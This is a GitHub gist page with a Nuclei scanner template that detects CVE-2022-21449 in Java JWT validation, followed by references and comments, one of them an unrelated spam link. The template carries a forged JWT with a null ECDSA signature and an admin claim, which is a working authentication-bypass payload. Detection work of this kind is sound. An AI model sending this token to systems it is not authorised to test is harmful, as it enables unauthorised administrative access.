Last active
December 18, 2023 06:50
-
-
Save righettod/1d2f4498e3dba4fc779036ce83565d68 to your computer and use it in GitHub Desktop.
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2022-21449 | |
info: | |
name: CVE-2022-21449 test exposure | |
description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place. | |
author: righettod | |
severity: info | |
tags: cve,2022,java | |
reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java | |
requests: | |
- raw: | |
- | | |
GET /?id={{randstr}} HTTP/1.1 | |
Host: {{Hostname}} | |
Cache-Control: no-store | |
- | | |
GET /?id={{randstr}} HTTP/1.1 | |
Host: {{Hostname}} | |
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA | |
Cache-Control: no-store | |
req-condition: true | |
matchers: | |
- type: dsl | |
dsl: | |
- '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200' |
References:
- https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
- https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app
- https://token.dev/
- ticarpi/jwt_tool#65
- projectdiscovery/nuclei-templates#4216
Need to add some matcher, if not, there will be many false positives
Yes, you have 100% right. It was a first proposal and I will refactor it to decrease the probability of false-positive.
@daffainfo I updated the template to try decreasing the probability of false-positive:
looks so much better
Thank you.
I am looking for the Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place and I am glad I found your post. I was searching for the translation service online and found this https://pickwriters.com/spanish-translation-services link as well as I found link to your post on google search and it saved my a lot of time in searching for your post.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Example of usage using this sample vulnerable application: